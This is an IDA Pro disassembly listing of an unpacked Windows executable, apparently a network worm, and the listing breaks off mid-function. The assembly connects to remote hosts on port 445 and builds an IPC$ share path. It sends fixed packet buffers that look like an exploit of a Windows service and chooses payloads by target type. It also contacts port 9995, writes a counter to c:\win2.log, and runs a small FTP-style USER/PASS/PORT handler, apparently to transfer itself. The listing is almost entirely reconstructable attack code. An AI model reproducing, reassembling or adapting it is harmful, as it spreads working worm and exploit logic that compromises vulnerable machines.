;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 60B46AA7DD36BB4040031F7011B4A240
; File Name : u:\work\60b46aa7dd36bb4040031f7011b4a240_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40127D+7C�p
; sub_401F2E:loc_401F9B�p ...
mov eax, dword_406F40
imul eax, 343FDh
add eax, 279EC3h
mov dword_406F40, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: sub_4020C8+1F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_406F40, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: sub_4020C8+24�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call dword_4050F0
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call dword_405120
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40127D+9C�p
; sub_401F2E+39�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call dword_405118
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call dword_405124
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call dword_40511C
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call dword_405018 ; lstrcpyA
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401F2E+126�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_402250
add esp, 0Ch
mov [ebp+var_10], 2
push 1BDh
call dword_405108
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push 0
push eax
call sub_402250
add esp, 10h
push 6
push 1
pop ebx
push ebx
push 2
call dword_40510C
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_405110
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call dword_405114
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40127D+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_405120
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call dword_405124
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401210 proc near ; CODE XREF: sub_40127D+F9�p
var_14 = byte ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
inc dword_406F44
push edi
push dword_406F44
lea eax, [ebp+var_14]
push offset aI ; "%i"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
push 0
push offset aCWin2_log ; "c:\\win2.log"
call dword_405024 ; _lcreat
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40127A
lea eax, [ebp+var_14]
push esi
push eax
call sub_4022B0
mov esi, dword_405020
pop ecx
push eax
lea eax, [ebp+var_14]
push eax
push edi
call esi ; dword_405020
push [ebp+arg_0]
call sub_4022B0
pop ecx
push eax
push [ebp+arg_0]
push edi
call esi ; dword_405020
push edi
call dword_40501C ; _lclose
pop esi
loc_40127A: ; CODE XREF: sub_401210+37�j
pop edi
leave
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40127D proc near ; CODE XREF: sub_401A84+7B�p
var_348 = dword ptr -348h
var_33C = byte ptr -33Ch
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_402250
add esp, 0Ch
mov [ebp+var_10], 2
push 270Bh
call dword_405108
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push ebx
push eax
call sub_402250
add esp, 10h
push 6
push 1
push 2
call dword_40510C
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012E2
xor al, al
jmp loc_401394
; ---------------------------------------------------------------------------
loc_4012E2: ; CODE XREF: sub_40127D+5C�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_405110
cmp eax, 0FFFFFFFFh
jz loc_40138B
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset dword_406F48
push eax
call dword_405018 ; lstrcpyA
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push off_406030
lea eax, [ebp+var_33C]
push eax
call dword_4050E0 ; wsprintfA
lea eax, [ebp+var_33C]
xor esi, esi
push eax
call sub_4022B0
add esp, 1Ch
test eax, eax
jbe short loc_401373
loc_40134F: ; CODE XREF: sub_40127D+F4�j
push ebx
lea eax, [ebp+esi+var_33C]
push 1
push eax
push edi
call dword_405104
lea eax, [ebp+var_33C]
inc esi
push eax
call sub_4022B0
cmp esi, eax
pop ecx
jb short loc_40134F
loc_401373: ; CODE XREF: sub_40127D+D0�j
push [ebp+arg_0]
call sub_401210
mov [esp+348h+var_348], 3E8h
call dword_405028 ; Sleep
mov bl, 1
pop esi
loc_40138B: ; CODE XREF: sub_40127D+75�j
push edi
call dword_405114
mov al, bl
loc_401394: ; CODE XREF: sub_40127D+60�j
pop edi
pop ebx
leave
retn
sub_40127D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401398 proc near ; CODE XREF: sub_401A84+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset dword_406F48
push [ebp+arg_4]
call dword_405018 ; lstrcpyA
push [ebp+arg_0]
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013D1: ; CODE XREF: sub_401398+49�j
mov dl, [ebp+ecx+var_3C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013D1
push 60h
lea eax, [ebp+var_B4]
push offset dword_4063E4
push eax
call sub_402330
lea eax, [ebp+var_3C]
push eax
call sub_4022B0
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_402330
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC+3)
push eax
call sub_4022B0
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_402330
lea eax, [ebp+var_3C]
push eax
call sub_4022B0
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_402330
lea eax, [ebp+var_3C]
push eax
call sub_4022B0
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_87]
push eax
call sub_402330
add esp, 2Ch
push [ebp+arg_0]
call dword_405124
mov ebx, eax
cmp ebx, edi
jz loc_401554
push edi
push 1
push 2
loc_401495: ; DATA XREF: .text:off_4065D8�o
call dword_40510C
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401554
push 1BDh
mov [ebp+var_14], 2
call dword_405108
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8
push edi
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push eax
call sub_402250
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call dword_405110
cmp eax, 0FFFFFFFFh
jz short loc_401554
mov ebx, dword_405104
push edi
push 89h
push offset dword_4061CC
push esi
call ebx ; dword_405104
cmp eax, 0FFFFFFFFh
jz short loc_401554
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, dword_405100
call esi ; dword_405100
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx ; dword_405104
cmp eax, 0FFFFFFFFh
jz short loc_401554
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; dword_405100
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx ; dword_405104
cmp eax, 0FFFFFFFFh
jnz short loc_401558
loc_401554: ; CODE XREF: sub_401398+F2�j
; sub_401398+10B�j ...
xor eax, eax
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401398+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; dword_405100
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401570: ; CODE XREF: sub_401398+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call dword_4050E0 ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401570
push [ebp+arg_0]
call dword_405114
push 1
pop eax
loc_401599: ; CODE XREF: sub_401398+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40159E proc near ; CODE XREF: sub_401A84+3B�p
; sub_401A84+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_C4 = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call sub_402670
mov eax, dword_406A30
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, dword_406A34
mov [ebp+var_10], eax
lea eax, [ebp+var_4C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015D8: ; CODE XREF: sub_40159E+4A�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015D8
push ebx
push esi
push edi
push 60h
lea eax, [ebp+var_C4]
push offset dword_4063E4
push eax
call sub_402330
lea eax, [ebp+var_4C]
push eax
call sub_4022B0
shl eax, 1
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_94]
push eax
call sub_402330
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_4022B0
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax
call sub_402330
lea eax, [ebp+var_4C]
push eax
call sub_4022B0
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_C1]
push eax
call sub_402330
lea eax, [ebp+var_4C]
push eax
call sub_4022B0
shl al, 1
add al, 9
push 1
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_97]
push eax
call sub_402330
add esp, 2Ch
push 270Bh
call dword_405108
xor eax, 9999h
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push offset dword_4060E4
call sub_402330
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_40171A
cmp ebx, 2
jz short loc_40171A
push 7D0h
lea eax, [ebp+var_F24]
push 90h
push eax
call sub_402250
mov esi, offset loc_406034
push esi
call sub_4022B0
push eax
lea eax, [ebp+var_E84]
push esi
push eax
call sub_402330
lea eax, [ebp+var_14]
push eax
call sub_4022B0
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_768]
push eax
call sub_402330
add esp, 2Ch
imul ebx, 3Ch
mov eax, dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017EE
; ---------------------------------------------------------------------------
loc_40171A: ; CODE XREF: sub_40159E+115�j
; sub_40159E+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi
push 90h
push eax
call sub_402250
imul ebx, 3Ch
push 4
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx
push eax
call sub_402330
mov esi, offset loc_406034
push esi
call sub_4022B0
push eax
lea eax, [ebp+var_24C4]
push esi
push eax
call sub_402330
push 4
lea eax, [ebp+var_21A0]
push offset dword_406A28
push eax
call sub_402330
push 4
lea eax, [ebp+var_219C]
push ebx
push eax
call sub_402330
add esp, 40h
push esi
call sub_4022B0
push eax
lea eax, [ebp+var_2190]
push esi
push eax
call sub_402330
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_4017A6: ; CODE XREF: sub_40159E+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_4017A6
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi
push 31h
push eax
call sub_402250
push esi
lea eax, [ebp+var_68EC]
push 31h
push eax
call sub_402250
add esp, 18h
loc_4017EE: ; CODE XREF: sub_40159E+177�j
push 0
push 1
push 2
call dword_40510C
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A7D
push 1BDh
mov [ebp+var_24], 2
call dword_405108
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_402250
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_405110
cmp eax, 0FFFFFFFFh
jz loc_401A7D
mov esi, dword_405104
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, dword_405100
call edi ; dword_405100
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405100
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405100
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_C4]
push eax
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405100
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405100
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405100
cmp [ebp+arg_4], 1
jz short loc_4019BB
cmp [ebp+arg_4], 2
jz short loc_4019BB
push 7Ch
lea eax, [ebp+var_1F08]
push offset dword_406558
push eax
call sub_402330
lea eax, [ebp+var_F24]
push 7D0h
push eax
lea eax, [ebp+var_1E8C]
push eax
call sub_402330
push 90h
lea eax, [ebp+var_16BC]
push offset off_4065D8
push eax
call sub_402330
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A5E
; ---------------------------------------------------------------------------
loc_4019BB: ; CODE XREF: sub_40159E+3B8�j
; sub_40159E+3BE�j
push 68h
lea eax, [ebp+var_89C4]
push offset dword_40666C
push eax
call sub_402330
lea eax, [ebp+var_4814]
push 1B5Ah
push eax
lea eax, [ebp+var_895C]
push eax
call sub_402330
push 70h
lea eax, [ebp+var_68EC]
push offset dword_4066D8
push eax
call sub_402330
lea eax, [ebp+var_3780]
push 0A5Eh
push eax
lea eax, [ebp+var_687C]
push eax
call sub_402330
push 84h
lea eax, [ebp+var_5DB8]
push offset dword_40674C
push eax
call sub_402330
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405100
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A5E: ; CODE XREF: sub_40159E+418�j
push eax
push [ebp+var_4]
call esi ; dword_405104
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 3E8h
call dword_405028 ; Sleep
push [ebp+var_4]
call dword_405114
loc_401A7D: ; CODE XREF: sub_40159E+264�j
; sub_40159E+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40159E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A84 proc near ; CODE XREF: sub_4020C8+3A�p
var_84 = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_84]
push eax
push esi
call sub_401398
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401B05
lea eax, [ebp+var_84]
push offset dword_406A3C
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401AC8
push 0
push esi
call sub_40159E
push 0
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AC8: ; CODE XREF: sub_401A84+36�j
lea eax, [ebp+var_84]
push offset dword_406A38
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401AEB
push 1
push esi
call sub_40159E
push 1
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AEB: ; CODE XREF: sub_401A84+59�j
push 2
push esi
call sub_40159E
push 2
loc_401AF5: ; CODE XREF: sub_401A84+42�j
; sub_401A84+65�j
push esi
call sub_40159E
add esp, 10h
push esi
call sub_40127D
pop ecx
loc_401B05: ; CODE XREF: sub_401A84+1F�j
pop esi
leave
retn
sub_401A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B08 proc near ; CODE XREF: sub_401F2E+115�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
call sub_404D52
push [ebp+arg_4]
mov esi, eax
lea eax, [ebp+var_24]
or [ebp+var_1C], 0FFFFFFFFh
push 24h
push eax
xor eax, eax
push eax
push eax
push eax
push [ebp+arg_0]
push esi
call sub_404D4C
test eax, eax
jnz short loc_401B3A
or eax, 0FFFFFFFFh
jmp short loc_401B43
; ---------------------------------------------------------------------------
loc_401B3A: ; CODE XREF: sub_401B08+2B�j
push esi
call sub_404D46
mov eax, [ebp+var_1C]
loc_401B43: ; CODE XREF: sub_401B08+30�j
pop esi
leave
retn
sub_401B08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B46 proc near ; DATA XREF: sub_401EA3+74�o
var_8E4 = byte ptr -8E4h
var_4E4 = byte ptr -4E4h
var_4E0 = byte ptr -4E0h
var_E4 = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E67
push esi
push edi
push 0
push off_4068D0
call sub_4022B0
mov esi, dword_405104
pop ecx
push eax
push off_4068D0
push ebx
call esi ; dword_405104
mov edi, [ebp+arg_0]
jmp short loc_401B84
; ---------------------------------------------------------------------------
loc_401B81: ; CODE XREF: sub_401B46+310�j
mov ebx, [ebp+arg_0]
loc_401B84: ; CODE XREF: sub_401B46+39�j
push 0
lea eax, [ebp+var_4E4]
push 400h
push eax
push ebx
call dword_405100
and [ebp+eax+var_4E4], 0
mov [ebp+var_10], eax
lea eax, [ebp+var_4E4]
push offset aUser ; "USER"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401BD5
push 0
push off_4068D4
call sub_4022B0
pop ecx
push eax
push off_4068D4
jmp loc_401E4F
; ---------------------------------------------------------------------------
loc_401BD5: ; CODE XREF: sub_401B46+73�j
lea eax, [ebp+var_4E4]
push offset aPass ; "PASS"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401C06
push 0
push off_4068D8
call sub_4022B0
pop ecx
push eax
push off_4068D8
jmp loc_401E4F
; ---------------------------------------------------------------------------
loc_401C06: ; CODE XREF: sub_401B46+A4�j
lea eax, [ebp+var_4E4]
push offset aPort ; "PORT"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz loc_401CE2
lea eax, [ebp+var_4E0]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_4027C0
mov ax, word_406A5C
mov [ebp+var_4], ax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402720
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C55: ; CODE XREF: sub_401B46+159�j
test ebx, ebx
jz short loc_401C89
cmp edi, 4
jge short loc_401C6C
push ebx
call sub_401E6E
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C6C: ; CODE XREF: sub_401B46+116�j
jnz short loc_401C78
push ebx
call sub_401E6E
pop ecx
mov [ebp+var_18], eax
loc_401C78: ; CODE XREF: sub_401B46:loc_401C6C�j
cmp edi, 5
jnz short loc_401C8C
push ebx
call sub_401E6E
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C8C
; ---------------------------------------------------------------------------
loc_401C89: ; CODE XREF: sub_401B46+111�j
push 6
pop edi
loc_401C8C: ; CODE XREF: sub_401B46+135�j
; sub_401B46+141�j
lea eax, [ebp+var_4]
push eax
push 0
call sub_402720
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C55
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call dword_4050E0 ; wsprintfA
add esp, 18h
push 0
push off_4068E0
call sub_4022B0
pop ecx
push eax
